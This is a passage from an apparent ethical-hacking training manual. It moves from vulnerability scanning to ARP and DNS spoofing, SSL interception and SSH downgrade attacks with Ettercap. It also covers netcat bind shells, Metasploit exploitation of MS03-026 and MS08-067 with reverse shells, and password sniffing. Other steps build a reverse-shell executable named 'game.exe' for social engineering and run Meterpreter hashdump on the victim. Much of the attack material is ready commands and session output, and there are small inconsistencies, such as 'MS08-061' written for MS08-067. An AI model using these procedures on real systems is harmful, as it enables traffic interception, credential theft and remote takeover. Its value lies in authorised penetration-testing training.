6. Download the Windows File. You need a 64-bit Machine for Nexpose to run. It is
recommended that the machine should have 8 GB RAM.
7. Double click on the installer file

8. Follow the installation steps

TRANCHULAS | www.tranchulas.com 87
Hands-On Ethical Hacking and Penetration Testing Training Course

9. Select the Default option

TRANCHULAS | www.tranchulas.com 88
Hands-On Ethical Hacking and Penetration Testing Training Course

10. Create an account for administration.

11. Installation will start. It will take some time to complete

Starting Nexpose

1. Start Nexpose Service.

TRANCHULAS | www.tranchulas.com 89
Hands-On Ethical Hacking and Penetration Testing Training Course

2. The console will start the Web browser. If it doesn’t, go to https://localhost:3780

3. After some time you will be redirected to login page. Login using the credentials you setup
during the installation.
4. Enter the product Key you received in the email.

5. After activation, you will get the following screen.

TRANCHULAS | www.tranchulas.com 90
Hands-On Ethical Hacking and Penetration Testing Training Course

6. Click on Home

7. Click on Create Site

TRANCHULAS | www.tranchulas.com 91
Hands-On Ethical Hacking and Penetration Testing Training Course

8. Enter the required information

9. Click on Assets

TRANCHULAS | www.tranchulas.com 92
Hands-On Ethical Hacking and Penetration Testing Training Course

10. Enter the IP address of machine or the URL of web application

TRANCHULAS | www.tranchulas.com 93
Hands-On Ethical Hacking and Penetration Testing Training Course

11. Go to Templates. Select Full Audit without web spider

12. Click on Save and Scan

13. The scan will start

TRANCHULAS | www.tranchulas.com 94
Hands-On Ethical Hacking and Penetration Testing Training Course

14. Once the scan is complete. Go to Vulnerabilities section to see the vulnerabilities found
by the scan

15. You will see the details of the vulnerabilities

TRANCHULAS | www.tranchulas.com 95
Hands-On Ethical Hacking and Penetration Testing Training Course

16. Go generate reports, go to the Reports section

17. Click on New

TRANCHULAS | www.tranchulas.com 96
Hands-On Ethical Hacking and Penetration Testing Training Course

18. Name the report and select “Audi Report” from report templates.

19. Select the scan under the Scope of report.

20. Click on Select Scan and select the scan you just performed

TRANCHULAS | www.tranchulas.com 97
Hands-On Ethical Hacking and Penetration Testing Training Course

21. Click on Save and Run the report

22. The Report will be generated.

TRANCHULAS | www.tranchulas.com 98
Hands-On Ethical Hacking and Penetration Testing Training Course

23. Click on Test Report and you will be able to view it. There are various formats of reports
that you can generate.

Nessus Vulnerability Scanner

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable
Network Security. Nessus allows you to scan the following types of vulnerabilities:

• Vulnerabilities that allow a remote hacker to control or access sensitive data on a system.
• Misconfiguration (e.g. open mail relay, missing patches, etc.).
• Default passwords, a few common passwords, and blank/absent passwords on some
system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary
attack.
• Denials of service against the TCP/IP stack by using malformed packets
• Preparation for PCI DSS audits
To configure Nessus, follow these steps:
1. Download Nessus from https://www.tenable.com/products/nessus/select-your-
operating-system
2. After download you will need a key to activate it. Go to
https://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code
and Register for the free version.
3. You must have a corporate email in order to register it. Fill the required information on
the form. You will get an email with the key.
4. Start the installation

TRANCHULAS | www.tranchulas.com 99
Hands-On Ethical Hacking and Penetration Testing Training Course

6. After the installation is complete it will automatically launch the browser and redirect to
a start page. If it doesn’t go to https://localhost:8834

7. Enter the username and password of the admin account

TRANCHULAS | www.tranchulas.com 100

Hands-On Ethical Hacking and Penetration Testing Training Course

8. It will ask you for the activation code you have received in the email

9. Nessus will now take some time to complete the installation. In case of any problem it
will prompt you to run nessuscli update. Go to your installation directory and run
nessucli.exe update command in command prompt. Make sure command prompt is run
as administrator

TRANCHULAS | www.tranchulas.com 101

Hands-On Ethical Hacking and Penetration Testing Training Course

C:\Program Files\Tenable\Nessus>nessuscli.exe update

Restart your computer after completion

Running a Scan
1. Open browser and go to https://localhost:8834
2. Login using the credentials you set during setup

3. You will be presented with the following screen

TRANCHULAS | www.tranchulas.com 102

Hands-On Ethical Hacking and Penetration Testing Training Course

4. Click on New Scan. Select Basic Network Scan

5. Fill the required fields and click Save.

TRANCHULAS | www.tranchulas.com 103

Hands-On Ethical Hacking and Penetration Testing Training Course

6. Click Launch icon

7. The scan will start

8. Click on the scan to get details

TRANCHULAS | www.tranchulas.com 104

Hands-On Ethical Hacking and Penetration Testing Training Course

5. Click on 127.0.0.1

6. Once the scan is complete you can export the reports in various formats. Click on Export

TRANCHULAS | www.tranchulas.com 105

Hands-On Ethical Hacking and Penetration Testing Training Course

9. Select any format. For example I will select HTML. Select Custom

10. Click on Export

11. You will get a report with all the vulnerabilities

TRANCHULAS | www.tranchulas.com 106

Hands-On Ethical Hacking and Penetration Testing Training Course

TRANCHULAS | www.tranchulas.com 107

Hands-On Ethical Hacking and Penetration Testing Training Course

Module 7: ARP Spoofing

TRANCHULAS | www.tranchulas.com 108

Hands-On Ethical Hacking and Penetration Testing Training Course

What is ARP Spoofing?

ARP spoofing is a hacking technique whereby an attacker sends fake ("spoofed") Address
Resolution Protocol (ARP) messages onto a Local Area Network. Generally, the aim is to associate
the attacker's MAC address with the IP address of another host (such as the default gateway),
causing any traffic meant for that IP address to be sent to the attacker instead. ARP spoofing may
allow an attacker to intercept data frames on a LAN, modify the traffic, or stop the traffic
altogether. Often the attack is used as an opening for other attacks, such as denial of service,
man in the middle, or session hijacking attacks. The attack can only be used on networks that
make use of the Address Resolution Protocol (ARP), and is limited to local network segments.

Ettercap
Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It
can be used for computer network protocol analysis and security auditing. It is capable of
intercepting traffic on a network segment, capturing passwords, and conducting active
eavesdropping against a number of common protocols.

Reference: http://en.wikipedia.org/wiki/Ettercap_(computing)

1. Let’s play with ettercap in Kali Linux.

TRANCHULAS | www.tranchulas.com 109

Hands-On Ethical Hacking and Penetration Testing Training Course

root@kali:~# ettercap –G

2. Select Sniff -> Unified Sniffing.

3. Select Network Interface.
4. Select Hosts -> Scan for Hosts
5. Select Hosts -> Host List
6. Select your router gateway as Target 1 and hosts as target 2.
7. Check your targets.
8. Select MITM -> ARP Poisoning and make sure “Sniff remote connections” is checked.
9. Select Start -> Start Sniffing

DNS Spoofing
DNS spoofing is an attack, whereby data is introduced into a Domain Name System (DNS) name
server's cache database, causing the name server to return an incorrect IP address, diverting
traffic to another computer (often the attacker's).

To conduct DNS Spoofing through Ettercap, we need to conduct following steps:

1. Edit file ‘etter.dns’.

root@kali:~# nano /etc/ettercap/etter.dns

2. Make customization in file as demonstrated.

3. Start ettercap

TRANCHULAS | www.tranchulas.com 110

Hands-On Ethical Hacking and Penetration Testing Training Course

4. Select Sniff -> Unified Sniffing.

5. Select Network Interface.
6. Select Hosts -> Scan for Hosts
7. Select Hosts -> Host List
8. Select your router gateway as Target 1 and hosts as target 2.
9. Check your targets.
10. Select MITM -> ARP Poisoning and make sure “Sniff remote connections” is checked.
11. Select plugin -> Manage Plugins
12. Double click on dns-spoof plugin to activate it.
13. Select Start -> Start Sniffing

Alternatively you can skip step 3 to 13 and enter following command in terminal:

root@kali:~# ettercap –T –q –i eth0 –P dns_spoof –M arp /// ///

SSL Man in the Middle

1. Edit “etter.conf” file.

root@kali:~# nano /etc/ettercap/etter.conf

2. Locate following lines:

[privs]

ec_uid = 65534 # nobody is the default

ec_gid = 65534 # nobody is the default

Change them to:

[privs]

ec_uid = 0 # nobody is the default

ec_gid = 0 # nobody is the default

3. Locate following lines in the file, and uncomment them by removing the hashes then save
it and close it:

TRANCHULAS | www.tranchulas.com 111

Hands-On Ethical Hacking and Penetration Testing Training Course

# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface

-p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface

-p tcp --dport %port -j REDIRECT --to-port %rport"

Change it to:

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface

-p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface

-p tcp --dport %port -j REDIRECT --to-port %rport"

4. Let’s assume our target is 192.168.1.150. We’ll give following command:

root@kali:~# ettercap –Tq –i eth0 –M arp:remote, oneway /192.168.1.150/// ///

5. Victim will be asked to accept an untrusted certificate. Credentials will get compromised
if the certificate is accepted.

Traffic Forgery
Ettercap has the ability to route traffic though itself using "Man in the Middle" attacks and then
use filters to modify the data before sending it on to the victim. Let’s create a Ettercap filter that
will replace words on a page, in real time. Once the victim browses to this page, his traffic will be
redirected through the attacking machine.

1. Open an editor and paste following code:

TRANCHULAS | www.tranchulas.com 112

Hands-On Ethical Hacking and Penetration Testing Training Course

if (ip.proto == TCP && search(DATA.data, "promoted") ) {

log(DATA.data, "/tmp/mispelled_ettercap.log");

replace("promoted", "fired");

msg("Correctly substituted and logged.\n");

In above example the word “promoted” will be replaced with word “fired”.

Or if you would like to replace image on web page:

if (ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data, "Accept-Encoding")) {

replace("Accept-Encoding", "Accept-Rubbish!");

msg("Modified Accept-Encoding!\n");

if (ip.proto == TCP && tcp.src == 80) {

replace("img src=", "img src=\"http://tranchulas.com/image.png\" ");

replace("IMG SRC=", "img src=\" http://tranchulas.com/image.png\" ");

msg("Replaced the picture.\n");

if (ip.proto == UDP && udp.src == 80) {

replace("img src=", "img src=\"http:// http://tranchulas.com/image.png\" ");

replace("IMG SRC=", "img src=\" http://tranchulas.com/image.png\" ");

msg("Replaced the picture.\n");

TRANCHULAS | www.tranchulas.com 113

Hands-On Ethical Hacking and Penetration Testing Training Course

2. Save it as .filter on your desktop.

3. Go to the Desktop directory.

root@kali:~# cd Desktop

4. Compile the filter.

root@kali:~/Desktop# etterfilter firstfilter.filter -o firstfilter.ef

5. Let’s assume our target is 192.168.1.150. Run following command to start the attack:

root@kali:~/Desktop# ettercap -T -q -F firstfilter.ef -M ARP /192.168.1.150//

///

To target all hosts on network, use following command:

root@kali:~/Desktop# ettercap -T -q -F firstfilter.ef -M ARP /// ///

-T tells Ettercap to use the text interface.

-q tells Ettercap to be quiet or less verbose.
-F tells Ettercap to use a filter, in this case firstfilter.ef is filter.
-M tells Ettercap to activate MITM (Man in the Middle)

SSH Downgrade Attack

Downgrade attack is a very crafty technique which can be used during MITM. The principle is to
downgrade a protocol version by changing data inside packets, to another version known to be
vulnerable. SSH is one example of a downgrade attack where the attacker forces the client and
the server to use the insecure SSH1 protocol. The client sends a request to establish a SSH link to
the server and asks it for the version it supports.
The server answers either with:

• sh-2.xx The server supports only SSH2

• ssh-1.99 The server supports SSH1 and SSH2
• ssh-1.51 The server supports only SSH1

TRANCHULAS | www.tranchulas.com 114

Hands-On Ethical Hacking and Penetration Testing Training Course

Let’s assume our target server is using ssh-1.99 and is configured to support both SSH1 and SSH2
and the client is set to use SSH2 and SSH1 but SSH2 as a preference. Here we will change answer
of server by modifying the "1.99" string to "1.51" to indicate to the client that the server supports
only SSH1. Victim who thinks to use SSH2 protocol will login with SSH1 and password will be
captured as SSH1 has weak password authentication mechanism.

Ettercap has a predefined configuration file for the SSH downgrade attack. The file is
/usr/local/share/ettercap/etter.filter.ssh.

TRANCHULAS | www.tranchulas.com 115

Hands-On Ethical Hacking and Penetration Testing Training Course

1. You are not required to change anything in file. Just compile it:

root@kali:~# cd /usr/share/ettercap/
root@kali:/usr/share/ettercap# etterfilter etter.filter.ssh -o etter.ssh.ef

2. Launch Ettercap.
3. Select Sniff -> Unified Sniffing.
4. Select Network Interface.
5. Select Hosts -> Scan for Hosts
6. Select Hosts -> Host List
7. Select your router gateway as Target 1 and hosts as target 2.
8. Check your targets.
9. Select MITM -> ARP Poisoning and make sure “Sniff remote connections” is checked.
10. Select Filters -> Load a filter -> Select etter.ssh.ef. The filter is now loaded.
11. Select Start -> Start Sniffing

TRANCHULAS | www.tranchulas.com 116

Hands-On Ethical Hacking and Penetration Testing Training Course

Module 8: Exploitation

TRANCHULAS | www.tranchulas.com 117

Hands-On Ethical Hacking and Penetration Testing Training Course

Netcat
Netcat is also known as hackers’ Swiss army knife. It can read and write to TCP and UDP ports. Netcat
runs in 2 modes:

• Server
• Client

Reverse Connections vs. Bind Connections

Bind Connection
User Ben wants to connect with Eve to help with something so all Ben has to do is bind his shell
to a port and Eve will connect to this port allowing her to control his machine. Ben will execute
netcat on his Ubuntu machine:

tester@ubuntu:~$ nc -l -p 12345 -e /bin/bash

If you get an error you must first install netcat by typing apt-get install netcat in terminal. After
that switch to netcat transitional. Type sudo update-alternatives --config nc and select option
/bin/nc.traditional
Now connect from your Kali Linux machine

root@kali:~# nc 192.168.1.6 12345

You are now connected to terminal of the machine on which netcat server was running. Type
whoami or any other command. The command will be executed.

Implementing Chat through Netcat

PC-1

root@kali ~ # nc –lvvp 4444

listening on [any] 4444 …

PC-2:

root@kali ~ # nc –vv [IP of PC1] 4444

TRANCHULAS | www.tranchulas.com 118

Hands-On Ethical Hacking and Penetration Testing Training Course

Metasploit
The Metasploit ® Framework is a free, open source penetration testing solution developed by the
open source community & Rapid7. Metasploit can be used to test the vulnerability of computer
systems to protect them, and it can be used to break into remote systems. Like many
information security tools, Metasploit can be used for both legitimate and unauthorized
activities.

Interfaces
Metasploit Framework has following interfaces:

• Msfcli: Command line interface

• Msfweb: Point and click web based interface
• Msfconsole: All in one console based interface

Steps for Exploitation

The basic steps for exploiting a system using the framework include:
1. Choosing and configuring an exploit (code that enters a target system by taking
advantage of one of its bugs; about 300 different exploits for Windows, Unix/Linux and
Mac OS X systems are included);
2. Checking whether the intended target system is susceptible to the chosen exploit
(optional);
3. Choosing and configuring a payload (code that will be executed on the target system upon
successful entry, for instance a remote shell or a VNC server);
4. Choosing the encoding technique to encode the payload so that the intrusion-prevention
system (IPS) will not catch the encoded payload;
5. Executing the exploit.

Msfconsole
To access msfconsole run the following command.

root@kali:~# msfconsole

If you get an error run the following command:

root@kali:~#service postgresql start

To take a look at available exploits:

TRANCHULAS | www.tranchulas.com 119
Hands-On Ethical Hacking and Penetration Testing Training Course

msf > show exploits

To take a look at available payloads:

msf > show payloads

Using Exploits
use exploit_name activates the exploit environment for the exploit exploit_name.

For example to select Microsoft RPC DCOM MS03-026 exploit using the name ms03_026, we’ll
use following command:

msf > use exploit/windows/dcerpc/ms03_026_dcom

msf exploit(ms03_026_dcom) >

You’ll notice msf> changed to exploit (ms03_026_dcom) >. This notifies that we are working inthe
temporary environment of that exploit.
The show options command displays the various parameters which are required to use the
exploit.

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description

---- --------------- -------- -----------
RHOST yes The target address
RPORT 135 yes The target port

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

For Microsoft RPC DCOM MSO3-026 it requires two parameters, RHOST (the target's address)
and RPORT (and the target's port, defaults to 135 in this case). The show targets command will
list all available targets for the selected exploit module.

TRANCHULAS | www.tranchulas.com 120

Hands-On Ethical Hacking and Penetration Testing Training Course

msf exploit(ms03_026_dcom) > show targets

Exploit targets:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

This module only has one target, which works on NT 4.0 SP6, plus all versions of Windows 2000,
and all versions of Windows XP.
The show payloads command will list all payloads that are compatible with the selected exploit.
MSF does a good job of preventing you from using the wrong payload for a given exploit.
We must set each of the options listed as 'required' before we can use this exploit. In this exploit
we only have a single target option, so we set the TARGET variable to 0, with the command set
TARGET 0.
Many exploits will choose a reasonable default target for you. We now set the target server's IP
address.

msf exploit(ms03_026_dcom) > set RHOST 192.168.2.25

RHOST => 192.168.2.25
msf exploit(ms03_026_dcom) >

Next we need to set the required payload (shellcode) for the exploit. Here we set PAYLOAD to
vncinject/reverse_tcp, using the command:

msf exploit(ms03_026_dcom) > set PAYLOAD windows/shell/reverse_tcp

PAyLOAD => windows/vncinject/reverse_tcp
msf exploit(ms03_026_dcom) >

Now we use the show options command to check which options have been set and which are
required to be set.

msf exploit(ms03_026_dcom) > show options

Module options (exploit/windows/dcerpc/ms03_026_dcom):

Name Current Setting Required Description

---- --------------- -------- -----------
RHOST 192.168.2.25 yes The target address
RPORT 135 yes The target port

TRANCHULAS | www.tranchulas.com 121

Hands-On Ethical Hacking and Penetration Testing Training Course

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal

msf exploit(ms03_026_dcom) >

As we can see, we still need to supply a value for the LHOST variable. LHOST is the IP address
where the exploit will connect to after it is successfully executed. Give the IP address of your
machine. To get IP address of your machine use ifconfig command. Use the tun0 interface IP
address.

root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.3.103 netmask 255.255.255.0 broadcast 192.168.3.255
inet6 fe80::20c:29ff:feab:675e prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ab:67:5e txqueuelen 1000 (Ethernet)
RX packets 151734 bytes 205833005 (196.2 MiB)
RX errors 2 dropped 8 overruns 0 frame 0
TX packets 83510 bytes 12956806 (12.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
device interrupt 19 base 0x2000

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536

inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1 (Local Loopback)
RX packets 55 bytes 20670 (20.1 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55 bytes 20670 (20.1 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

TRANCHULAS | www.tranchulas.com 122

Hands-On Ethical Hacking and Penetration Testing Training Course

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500

inet 192.167.0.6 netmask 255.255.255.255 destination 192.167.0.5
inet6 fe80::2460:bcd5:352c:daef prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 100 (UNSPEC)
RX packets 151185 bytes 194625218 (185.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 83186 bytes 5311766 (5.0 MiB)
TX errors 0 dropped 136 overruns 0 carrier 0 collisions 0

We set it using the command:

msf exploit(ms03_026_dcom) > set LHOST 192.167.0.6

LHOST => 192.167.0.6
msf exploit(ms03_026_dcom) >

Many exploits and payloads have another set of options, called advanced options. These can be
displayed with the command show advanced. Advanced options can perform tasks such as
modifying an exploit request to avoid an IDS signature, changing brute force settings, or
specifying exact return addresses to use.
At this point, everything is ready and all variables have been set. We make a final check on the
exploit with the show options command and verify that we are good to go. The exploit or run
command actually launches the attack, doing whatever it needs to do to have the payload
executed on the remote system.

msf exploit(ms03_026_dcom) > exploit

The check command can be used to whether or not the target system is vulnerable to attack. The
check feature is not available with every exploit, but can be useful when you are trying to
determine if a system is patched before trying to exploit it.

The Famous MS08-067

MS08-061 was a vulnerability present in windows XP and windows server 2003 that allows
remote code execution. The attacker can exploit this vulnerability to gain access to the target and
perform various malicious tasks. An exploit is present in Metasploit for this vulnerability named
ms08_067_netapi. We will now exploit a Windows XP machine using this exploit.
A windows XP machine is running at IP address 192.168.2.9

Let’s configure the exploit. Run the following commands on msfconsole

TRANCHULAS | www.tranchulas.com 123

Hands-On Ethical Hacking and Penetration Testing Training Course

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.2.9
RHOST => 192.168.2.9

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

PAYLOAD => windows/shell/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.167.0.6

LHOST => 192.167.0.6

msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.167.0.6:4444
[*] 192.168.2.9:445 - Automatically detecting the target...
[*] 192.168.2.9:445 - Fingerprint: Windows XP - Service Pack 0 / 1 - lang:English
[*] 192.168.2.9:445 - Selected Target: Windows XP SP0/SP1 Universal
[*] 192.168.2.9:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.9
[*] Command shell session 1 opened (192.167.0.6:4444 -> 192.168.2.9:3775) at 2017-01-01
00:54:16 -0500

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\>

As we can see that we have successfully exploited the target and we have got a reverse command
shell. We can use various OS commands

C:\>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : example.com

IP Address. . . . . . . . . . . . : 192.168.2.9
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 192.168.2.1

TRANCHULAS | www.tranchulas.com 124

Hands-On Ethical Hacking and Penetration Testing Training Course

Password Sniffing with Metasploit

Using psnuffle module is extremely simple. As you can see, the only mandatory option that
requires your action is RHOST.

msf > use auxiliary/sniffer/psnuffle

msf auxiliary(psnuffle) > run
[*] Auxiliary module execution completed
msf auxiliary(psnuffle) >
[*] Loaded protocol FTP from /usr/share/metasploit-
framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-
framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-
framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-
framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-
framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] HTTP GET: 192.168.3.116:1034-23.49.31.148:80
http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
[*] HTTP GET: 192.168.3.116:1035-23.99.98.228:80 http://home.microsoft.com/
[*] HTTP GET: 192.168.3.116:1036-204.79.197.203:80
http://www.msn.com/?redirfallthru=https%3a%2f%2ffanyv88.com%3a443%2fhttp%2fhome.microsoft.com%2f%3f
[*] HTTP GET: 192.168.3.116:1037-104.75.215.167:80 http://static-hp-eus.s-msn.com/en-
us/homepage/_sc/css/6670b51d-8b551b9/direction=ltr.locales=en-
us.themes=start.dpi=resolution1x/57-1d74af-4e3b0a9b/96-a0dfbe-ee5f2b10/4c-8d1996-
baa23df0/57-f96e00-f94d3276/87-8b4d46-a648eab2/6c-0ca890-63b61fa3/ed-0da767-
68ddb2ab/81-8e55d2-654638bf/finance-css-15-5ae05e329a0b7482d55ddcf5edfea1-
c16bd114/finance-css-3f-ad9d0a2be5f7ee4d4f000fb0289b37-
e61d2c?ver=2.0.5784.31054&fdhead=muidflt9cf,muidflt47cf,d-thshldie1,d-
thshldie2&csopd=20151105080311&csopdb=20151104235550

Footprinting MySQL
The advanced footprinting of MySQL servers is very useful. If you're performing an internal
penetration test this is a must use tool. When MySQL installs, it installs on port 3306 TCP. This
module can be used to footprint mysql server to find its version

msf auxiliary(psnuffle) > use auxiliary/scanner/mysql/mysql_version

msf auxiliary(mssql_ping) > set RHOSTS 192.168.2.8
TRANCHULAS | www.tranchulas.com 125
Hands-On Ethical Hacking and Penetration Testing Training Course

RHOSTS => 192.168.2.8

msf auxiliary(mssql_ping) > run
[*] 192.168.2.8:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

SMB Version Scanning

We can discover which operating systems are running to narrow down our attacks. You can use
'scanner/smb/version' if port 445 is open on several machines in network. This will help us
determine which version of Windows is running on a target and which Samba version is on a
Linux host.

msf > use auxiliary/scanner/smb/smb_version

msf auxiliary(smb_version) > set RHOSTS 192.168.2.12
RHOSTS => 192.168.2.9
msf auxiliary(smb_version) > run

[*] 192.168.2.12:445 - Host is running Windows 2003 SP2 (build:3790) (name:IMP-SERVER3)

(workgroup:WORKGROUP )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Importing External Modules in Metasploit

There are many times when there are no exploits in the metasploit framework that work on the
target system. We can import external modules into the framework. For example we will import
this exploit from exploit-db into metasploit:
https://www.exploit-db.com/exploits/31433/
Open terminal and navigate to Desktop

root@kali:~# cd Desktop
root@kali:~/Desktop#

Create a ruby file with .rb extension using nano and copy all the code from the link on the file.
Save the file.

root@kali:~/Desktop# nano exp1.rb

TRANCHULAS | www.tranchulas.com 126

Hands-On Ethical Hacking and Penetration Testing Training Course

Copy the code and save the file. Ctrl + X to save the file

Now run the following commands:

root@kali:~/Desktop# mkdir -p $HOME/.msf4/modules/exploits/test

root@kali:~/Desktop# cp exp1.rb $HOME/.msf4/modules/exploits/test
root@kali:~/Desktop# cd $HOME/.msf4/modules/exploits/test

Open msfconsole and use the following to get to your exploit

msf > reload_all

msf > use exploit/test/exp1
msf exploit(exp1) >

As we can see the exploit is added and we can now use it.

Client Side Attacks

Client-Side exploits are a major front for attackers today. As network administrators and
software developers fortify the perimeter, pentesters need to find a way to make the victims
open the door for them to get into the network. Client -side exploits require user-
TRANCHULAS | www.tranchulas.com 127
Hands-On Ethical Hacking and Penetration Testing Training Course

interaction such as enticing them to click a link, open a document, or somehow get to
your malicious website.
Binary Payloads
One of interesting features of Metasploit is the ability to generate an executable from a
Metasploit payload. This can be very useful in situations such as social engineering, if you can get
a user to run your payload for you; there is no reason to go through the trouble of exploiting any
software.
Let’s generate a reverse shell payload, execute it on a remote system, and get our shell
through a command line tool called msfvenom. We'll generate a Windows reverse shell
executable that will connect back to us on port 31337.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.3.109

LPORT=31337 -f exe > /root/Desktop/game.exe

We have created an exe file named game.exe

root@kali:~# cd Desktop/
root@kali:~/Desktop# file game.exe
game.exe: PE32 executable (GUI) Intel 80386, for MS Windows

Now we have a windows executable ready to go. We will use 'multi/handler' which is a stub that
handles exploits launched outside of the framework.

root@kali:~/Desktop# service postgresql start

root@kali:~/Desktop# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.3.109
LHOST => 192.168.3.109
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

TRANCHULAS | www.tranchulas.com 128

Hands-On Ethical Hacking and Penetration Testing Training Course

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: , , seh, thread, process, none)
LHOST 192.168.3.109 yes The listen address
LPORT 31337 yes The listen port

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > run

[*] Started reverse handler on 192.168.3.109:31337

[*] Starting the payload handler...

Now that we have everything set up and ready to go. We now need to transport the exe file to
the victim’s computer and execute it. As soon as the file is executed it will give us a meterpreter
reverse shell

As soon as we click on the file

TRANCHULAS | www.tranchulas.com 129

Hands-On Ethical Hacking and Penetration Testing Training Course

Meterpreter Shell
Meterpreter is an effective payload that allows to perform various post-exploitation functions. It
comes with its own set of commands which provide various functionality. Following section will
cover some of the commands.
To get a list of commands type help

meterpreter > help

To get contents of the directory type ls

meterpreter > ls
Listing: C:\
============

Mode Size Type Last modified Name

---- ---- ---- ------------- ----
100777/rwxrwxrwx 0 fil 2016-11-03 10:16:25 -0400 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2016-11-03 10:16:25 -0400 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2016-11-03 10:21:44 -0400 Documents and Settings
100444/r--r--r-- 0 fil 2016-11-03 10:16:25 -0400 IO.SYS
100444/r--r--r-- 0 fil 2016-11-03 10:16:25 -0400 MSDOS.SYS
100555/r-xr-xr-x 47580 fil 2003-03-31 07:00:00 -0500 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2016-11-03 02:26:28 -0400 Program Files
40777/rwxrwxrwx 0 dir 2016-11-03 10:21:32 -0400 System Volume Information
40777/rwxrwxrwx 0 dir 2016-11-03 02:45:26 -0400 WINDOWS
100666/rw-rw-rw- 194 fil 2016-11-03 10:13:42 -0400 boot.ini

TRANCHULAS | www.tranchulas.com 130

Hands-On Ethical Hacking and Penetration Testing Training Course

100444/r--r--r-- 233632 fil 2003-03-31 07:00:00 -0500 ntldr

100666/rw-rw-rw- 402653184 fil 2016-11-04 03:51:09 -0400 pagefile.sys

To get a screenshot of the target’s desktop use the following command:

meterpreter > screenshot

Screenshot saved to: /root/DhZkcjtB.jpeg

Running getuid will display the user that the Meterpreter server is running as on the host.

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

The hashdump post module will dump the contents of the SAM database. Note: This module will
only run if meterpreter has required privileges

meterpreter > hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c0
89c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:7c00edaf596c339bbc367d53a1f70c48:b73b919d7fd1aa8c22e14eb4f27f5
002:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1701d9d72371d102d479
78eec32772eb:::

These are NTLM hashes that can be cracked using a dictionary attack to get the passwords.
A great feature that meterpreter provides is to migrate itself to a running process. Let us take an
example. Run ps command to get a list of running processes

meterpreter > ps

Process List
============

